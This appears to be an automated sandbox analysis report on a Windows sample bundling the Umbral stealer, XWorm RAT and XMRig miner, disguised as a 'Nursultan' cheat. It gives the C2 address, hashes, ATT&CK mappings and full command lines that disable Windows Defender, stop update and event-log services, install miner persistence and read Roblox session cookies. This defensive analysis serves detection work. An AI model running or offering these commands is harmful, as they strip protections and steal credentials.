umbral | 98d19ece6f9d50124465ab6c1eef845659aada6c62d3e32a2b75b487cf4efdda

Analysis

max time kernel
13s
max time network
153s
platform
windows10-2004_x64
resource
win10v2004-20240611-en
resource tags

arch:x64arch:x86image:win10v2004-20240611-enlocale:en-usos:windows10-2004-x64system
submitted
01-07-2024 02:04

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

87fdd3337325634e35611a0cf9a9a4de31d4630dada6eeea83f261be5fbcaa95.exe
Size

3.0MB
MD5

6850a8c541b310a2f4a5cd88352856a3
SHA1

372ff19e90cec46e37797b343fe6f537116b4aae
SHA256

87fdd3337325634e35611a0cf9a9a4de31d4630dada6eeea83f261be5fbcaa95
SHA512

924d20cd368e797a771cf8b27b5e8994c62139a85a92ca068b64b0ac65598475b2225a81d08abb2aab9ad87f08d261f950219c16cee1b6d2e21c4b0c95eee4fa
SSDEEP

49152:g97jAtnr1ky+cFvVnJxuw9APD764uBxsPqlRJiM4C/d7Nch8zmOqYmlMH9TLi:g9otJOc/Jxuw9g764ssPqlbiM46ch8z6

Score

10^/10

umbral xmrig xworm evasion execution miner persistence rat spyware stealer trojan upx

Malware Config

Extracted

Family

xworm

Version

5.0

127.0.0.1:28223

unknown-sunglasses.gl.at.ply.gg:28223

Mutex

rVUJpGK3xHCE778M

Attributes

Install_directory
%AppData%
install_file
svchost.exe

aes.plain

Signatures

Detect Umbral payload 2 IoCs

resource	yara_rule
behavioral2/files/0x0009000000022937-43.dat	family_umbral
behavioral2/memory/4584-50-0x000001A8B4AC0000-0x000001A8B4B00000-memory.dmp	family_umbral

Detect Xworm Payload 1 IoCs

resource	yara_rule
behavioral2/memory/1248-148-0x0000000000400000-0x0000000000412000-memory.dmp	family_xworm

Umbral
Umbral stealer is an opensource moduler stealer written in C#.
stealer umbral
Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 8 IoCs

miner

resource	yara_rule
behavioral2/memory/812-268-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral2/memory/812-272-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral2/memory/812-273-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral2/memory/812-276-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral2/memory/812-275-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral2/memory/812-274-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral2/memory/812-269-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral2/memory/812-361-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig

Command and Scripting Interpreter: PowerShell 1 TTPs 10 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
4476	powershell.exe
3616	powershell.exe
3320	powershell.exe
2944	powershell.exe
4964	powershell.exe
4816	powershell.exe
464	powershell.exe
3076	powershell.exe
3976	powershell.exe
1976	powershell.exe

Creates new service(s) 2 TTPs
persistence execution

Windows Service
T1543.003

Service Execution
T1569.002

Drops file in Drivers directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Запустить Nursultan.exe

Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

.NET Reactor proctector 2 IoCs

Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.

resource	yara_rule
behavioral2/files/0x000a000000023437-66.dat	net_reactor
behavioral2/memory/4244-94-0x0000000000940000-0x0000000000B28000-memory.dmp	net_reactor

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2447855248-390457009-3660902674-1000\Control Panel\International\Geo\Nation	87fdd3337325634e35611a0cf9a9a4de31d4630dada6eeea83f261be5fbcaa95.exe

Executes dropped EXE 4 IoCs

pid	Process
2532	Nursultan Setup.exe
4584	Запустить Nursultan.exe
4244	Nursultan.exe
1888	CrackLauncher.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

UPX packed file 13 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/812-264-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral2/memory/812-268-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral2/memory/812-272-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral2/memory/812-273-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral2/memory/812-276-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral2/memory/812-275-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral2/memory/812-274-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral2/memory/812-269-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral2/memory/812-267-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral2/memory/812-266-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral2/memory/812-265-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral2/memory/812-263-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral2/memory/812-361-0x0000000140000000-0x0000000140848000-memory.dmp	upx

Adds Run key to start application 2 TTPs 3 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2447855248-390457009-3660902674-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Nursultan Setup = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Nursultan Setup.exe"	87fdd3337325634e35611a0cf9a9a4de31d4630dada6eeea83f261be5fbcaa95.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2447855248-390457009-3660902674-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Запустить Nursultan = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Запустить Nursultan.exe"	87fdd3337325634e35611a0cf9a9a4de31d4630dada6eeea83f261be5fbcaa95.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2447855248-390457009-3660902674-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Nursultan = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Nursultan.exe"	87fdd3337325634e35611a0cf9a9a4de31d4630dada6eeea83f261be5fbcaa95.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
36	discord.com
39	discord.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
33	ip-api.com

Power Settings 1 TTPs 8 IoCs

powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

persistence

Power Settings

T1653

pid	Process
4756	powercfg.exe
452	powercfg.exe
3488	powercfg.exe
2260	powercfg.exe
4376	powercfg.exe
4376	powercfg.exe
4408	powercfg.exe
452	powercfg.exe

Launches sc.exe 14 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
1280	sc.exe
3752	sc.exe
4984	sc.exe
4220	sc.exe
2360	sc.exe
3932	sc.exe
3088	sc.exe
448	sc.exe
4252	sc.exe
968	sc.exe
872	sc.exe
4368	sc.exe
2116	sc.exe
752	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
228	wmic.exe

Modifies registry class 9 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2447855248-390457009-3660902674-1000_Classes\discord-1199748644409184347\shell\open	CrackLauncher.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2447855248-390457009-3660902674-1000_Classes\discord-1199748644409184347\ = "URL:Run game 1199748644409184347 protocol"	CrackLauncher.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2447855248-390457009-3660902674-1000_Classes\discord-1199748644409184347\URL Protocol	CrackLauncher.exe
Key created	\REGISTRY\USER\S-1-5-21-2447855248-390457009-3660902674-1000_Classes\discord-1199748644409184347\shell\open\command	CrackLauncher.exe
Key created	\REGISTRY\USER\S-1-5-21-2447855248-390457009-3660902674-1000_Classes\discord-1199748644409184347\shell	CrackLauncher.exe
Key created	\REGISTRY\USER\S-1-5-21-2447855248-390457009-3660902674-1000_Classes\discord-1199748644409184347	CrackLauncher.exe
Key created	\REGISTRY\USER\S-1-5-21-2447855248-390457009-3660902674-1000_Classes\discord-1199748644409184347\DefaultIcon	CrackLauncher.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2447855248-390457009-3660902674-1000_Classes\discord-1199748644409184347\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\CrackLauncher.exe"	CrackLauncher.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2447855248-390457009-3660902674-1000_Classes\discord-1199748644409184347\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\CrackLauncher.exe"	CrackLauncher.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
2360	PING.EXE

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
2280	schtasks.exe

Suspicious behavior: EnumeratesProcesses 12 IoCs

pid	Process
464	powershell.exe
464	powershell.exe
4476	powershell.exe
4476	powershell.exe
3076	powershell.exe
3076	powershell.exe
3976	powershell.exe
3976	powershell.exe
4928	powershell.exe
4928	powershell.exe
4604	powershell.exe
4604	powershell.exe

Suspicious use of AdjustPrivilegeToken 7 IoCs

description	pid	Process
Token: SeDebugPrivilege	464	powershell.exe
Token: SeDebugPrivilege	4476	powershell.exe
Token: SeDebugPrivilege	3076	powershell.exe
Token: SeDebugPrivilege	4584	Запустить Nursultan.exe
Token: SeDebugPrivilege	3976	powershell.exe
Token: SeDebugPrivilege	4928	powershell.exe
Token: SeDebugPrivilege	4604	powershell.exe

Suspicious use of WriteProcessMemory 25 IoCs

description	pid	Process	procid_target
PID 2128 wrote to memory of 464	2128	87fdd3337325634e35611a0cf9a9a4de31d4630dada6eeea83f261be5fbcaa95.exe	85
PID 2128 wrote to memory of 464	2128	87fdd3337325634e35611a0cf9a9a4de31d4630dada6eeea83f261be5fbcaa95.exe	85
PID 2128 wrote to memory of 2532	2128	87fdd3337325634e35611a0cf9a9a4de31d4630dada6eeea83f261be5fbcaa95.exe	87
PID 2128 wrote to memory of 2532	2128	87fdd3337325634e35611a0cf9a9a4de31d4630dada6eeea83f261be5fbcaa95.exe	87
PID 2128 wrote to memory of 4476	2128	87fdd3337325634e35611a0cf9a9a4de31d4630dada6eeea83f261be5fbcaa95.exe	88
PID 2128 wrote to memory of 4476	2128	87fdd3337325634e35611a0cf9a9a4de31d4630dada6eeea83f261be5fbcaa95.exe	88
PID 2128 wrote to memory of 4584	2128	87fdd3337325634e35611a0cf9a9a4de31d4630dada6eeea83f261be5fbcaa95.exe	90
PID 2128 wrote to memory of 4584	2128	87fdd3337325634e35611a0cf9a9a4de31d4630dada6eeea83f261be5fbcaa95.exe	90
PID 2128 wrote to memory of 3076	2128	87fdd3337325634e35611a0cf9a9a4de31d4630dada6eeea83f261be5fbcaa95.exe	91
PID 2128 wrote to memory of 3076	2128	87fdd3337325634e35611a0cf9a9a4de31d4630dada6eeea83f261be5fbcaa95.exe	91
PID 2128 wrote to memory of 4244	2128	87fdd3337325634e35611a0cf9a9a4de31d4630dada6eeea83f261be5fbcaa95.exe	93
PID 2128 wrote to memory of 4244	2128	87fdd3337325634e35611a0cf9a9a4de31d4630dada6eeea83f261be5fbcaa95.exe	93
PID 2128 wrote to memory of 4244	2128	87fdd3337325634e35611a0cf9a9a4de31d4630dada6eeea83f261be5fbcaa95.exe	93
PID 2128 wrote to memory of 1888	2128	87fdd3337325634e35611a0cf9a9a4de31d4630dada6eeea83f261be5fbcaa95.exe	94
PID 2128 wrote to memory of 1888	2128	87fdd3337325634e35611a0cf9a9a4de31d4630dada6eeea83f261be5fbcaa95.exe	94
PID 4584 wrote to memory of 3456	4584	Запустить Nursultan.exe	97
PID 4584 wrote to memory of 3456	4584	Запустить Nursultan.exe	97
PID 1888 wrote to memory of 4008	1888	CrackLauncher.exe	100
PID 1888 wrote to memory of 4008	1888	CrackLauncher.exe	100
PID 4584 wrote to memory of 3976	4584	Запустить Nursultan.exe	101
PID 4584 wrote to memory of 3976	4584	Запустить Nursultan.exe	101
PID 4584 wrote to memory of 4928	4584	Запустить Nursultan.exe	104
PID 4584 wrote to memory of 4928	4584	Запустить Nursultan.exe	104
PID 4584 wrote to memory of 4604	4584	Запустить Nursultan.exe	107
PID 4584 wrote to memory of 4604	4584	Запустить Nursultan.exe	107

Views/modifies file attributes 1 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
3456	attrib.exe

C:\Users\Admin\AppData\Local\Temp\87fdd3337325634e35611a0cf9a9a4de31d4630dada6eeea83f261be5fbcaa95.exe
"C:\Users\Admin\AppData\Local\Temp\87fdd3337325634e35611a0cf9a9a4de31d4630dada6eeea83f261be5fbcaa95.exe"
1⤵
- Checks computer location settings
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:2128
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:464
- C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe
  "C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe"
  2⤵
  - Executes dropped EXE
  PID:2532
- - C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
    C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:3320
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
    3⤵
    PID:3580
  - - C:\Windows\system32\wusa.exe
      wusa /uninstall /kb:890830 /quiet /norestart
      4⤵
      PID:4364
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop UsoSvc
    3⤵
    - Launches sc.exe
    PID:1280
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop WaaSMedicSvc
    3⤵
    - Launches sc.exe
    PID:3088
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop wuauserv
    3⤵
    - Launches sc.exe
    PID:3752
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop bits
    3⤵
    - Launches sc.exe
    PID:448
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop dosvc
    3⤵
    - Launches sc.exe
    PID:872
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
    3⤵
    - Power Settings
    PID:4376
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
    3⤵
    - Power Settings
    PID:4756
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
    3⤵
    - Power Settings
    PID:452
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
    3⤵
    - Power Settings
    PID:4408
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe delete "XMRKNZQC"
    3⤵
    - Launches sc.exe
    PID:4220
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe create "XMRKNZQC" binpath= "C:\ProgramData\scppqqgespxv\jqvljmboayxs.exe" start= "auto"
    3⤵
    - Launches sc.exe
    PID:4252
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop eventlog
    3⤵
    - Launches sc.exe
    PID:4368
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe start "XMRKNZQC"
    3⤵
    - Launches sc.exe
    PID:4984
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4476
- C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe
  "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"
  2⤵
  - Drops file in Drivers directory
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4584
- - C:\Windows\SYSTEM32\attrib.exe
    "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"
    3⤵
    - Views/modifies file attributes
    PID:3456
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3976
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4928
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4604
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
    3⤵
    PID:3868
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" os get Caption
    3⤵
    PID:1976
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" computersystem get totalphysicalmemory
    3⤵
    PID:3016
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" csproduct get uuid
    3⤵
    PID:1452
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
    3⤵
    PID:2840
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic" path win32_VideoController get name
    3⤵
    - Detects videocard installed
    PID:228
- - C:\Windows\SYSTEM32\cmd.exe
    "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe" && pause
    3⤵
    PID:5100
  - - C:\Windows\system32\PING.EXE
      ping localhost
      4⤵
      Runs ping.exe
      PID:2360
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan.exe'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3076
- C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
  "C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
  2⤵
  - Executes dropped EXE
  PID:4244
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
    3⤵
    PID:1248
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:3616
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'MSBuild.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:4964
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\svchost.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:4816
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:1976
  - - C:\Windows\SysWOW64\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\Admin\AppData\Roaming\svchost.exe"
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:2280
- C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe
  "C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"
  2⤵
  - Executes dropped EXE
  - Modifies registry class
  - Suspicious use of WriteProcessMemory
  PID:1888
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c cls
    3⤵
    PID:4008

C:\ProgramData\scppqqgespxv\jqvljmboayxs.exe
C:\ProgramData\scppqqgespxv\jqvljmboayxs.exe
1⤵
PID:1704
- C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:2944
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
  2⤵
  PID:3300
- - C:\Windows\system32\wusa.exe
    wusa /uninstall /kb:890830 /quiet /norestart
    3⤵
    PID:1976
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop UsoSvc
  2⤵
  - Launches sc.exe
  PID:2116
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop WaaSMedicSvc
  2⤵
  - Launches sc.exe
  PID:2360
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop wuauserv
  2⤵
  - Launches sc.exe
  PID:968
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop bits
  2⤵
  - Launches sc.exe
  PID:752
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop dosvc
  2⤵
  - Launches sc.exe
  PID:3932
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
  2⤵
  - Power Settings
  PID:4376
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
  2⤵
  - Power Settings
  PID:2260
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
  2⤵
  - Power Settings
  PID:3488
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
  2⤵
  - Power Settings
  PID:452
- C:\Windows\system32\conhost.exe
  C:\Windows\system32\conhost.exe
  2⤵
  PID:4600
- C:\Windows\system32\svchost.exe
  svchost.exe
  2⤵
  PID:812

C:\Users\Admin\AppData\Roaming\svchost.exe
C:\Users\Admin\AppData\Roaming\svchost.exe
1⤵
PID:2972

C:\Users\Admin\AppData\Roaming\svchost.exe
C:\Users\Admin\AppData\Roaming\svchost.exe
1⤵
PID:3812

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

System Services

T1569

Service Execution

T1569.002

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Power Settings

T1653

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Impair Defenses

T1562

Modify Registry

T1112

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
968cb9309758126772781b83adb8a28f

SHA1
8da30e71accf186b2ba11da1797cf67f8f78b47c

SHA256
92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a

SHA512
4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\svchost.exe.log

Filesize
841B

MD5
0efd0cfcc86075d96e951890baf0fa87

SHA1
6e98c66d43aa3f01b2395048e754d69b7386b511

SHA256
ff981780f37479af6a428dd121eef68cf6e0b471ae92f080893a55320cc993f7

SHA512
4e79f5a8494aac94f98af8dbbc71bdd0a57b02103757ad970da7e7d4e6a0dc5015ca008256a6bd2c5bdec3a0f5736a994e17b3ef004b0f374a3339e480ac41b1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
65a68df1062af34622552c4f644a5708

SHA1
6f6ecf7b4b635abb0b132d95dac2759dc14b50af

SHA256
718dc2f5f4a6dbb7fab7f3db05bd7f602fb16526caae7084ab46c3ab4e7bad35

SHA512
4e460eb566032942547b58411222dd26ae300a95f83cf5ae6df58ebd28594341123611b348bd4031a33bc7f38307d5cb8fb677bba8c896919e3eee677a104d4d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
948B

MD5
07d142044fb78e359c794180a9c6fdff

SHA1
8a7155f93a53ff1b7f382a4ccb3f58ff2f88808e

SHA256
2af8c3ca529953085ca25f69d9142964e2ce5508665c14f3533a47d254fed3ea

SHA512
356edd3598c09b765c3de325bc47c5c8ae7fcfd87e8c58e12e8bb6437f1d7ce58310e06c4d64336815833e280f2e61c288edb09508c4f29876d28b0d602aeb78

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
88be3bc8a7f90e3953298c0fdbec4d72

SHA1
f4969784ad421cc80ef45608727aacd0f6bf2e4b

SHA256
533c8470b41084e40c5660569ebbdb7496520d449629a235e8053e84025f348a

SHA512
4fce64e2dacddbc03314048fef1ce356ee2647c14733da121c23c65507eeb8d721d6b690ad5463319b364dc4fa95904ad6ab096907f32918e3406ef438a6ef7c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
75f5f6d1505c3d09f147fec53238c2c0

SHA1
508feb25bce53e5e3ac0b4ed70c1992e329bf07b

SHA256
464fbbbdf5db7ad5b4341e6f1fd33d4db12534e3df2769fc5efc51b4e0b47b33

SHA512
f5cc3a6b86c22994b5e7e01803e037b1ed4c7b48698b6b29087b5e5042c9cdb3697c3dc58e261f7bd9200b0133da7601aee21643b09a152553c1d05c51424461

Download Submit
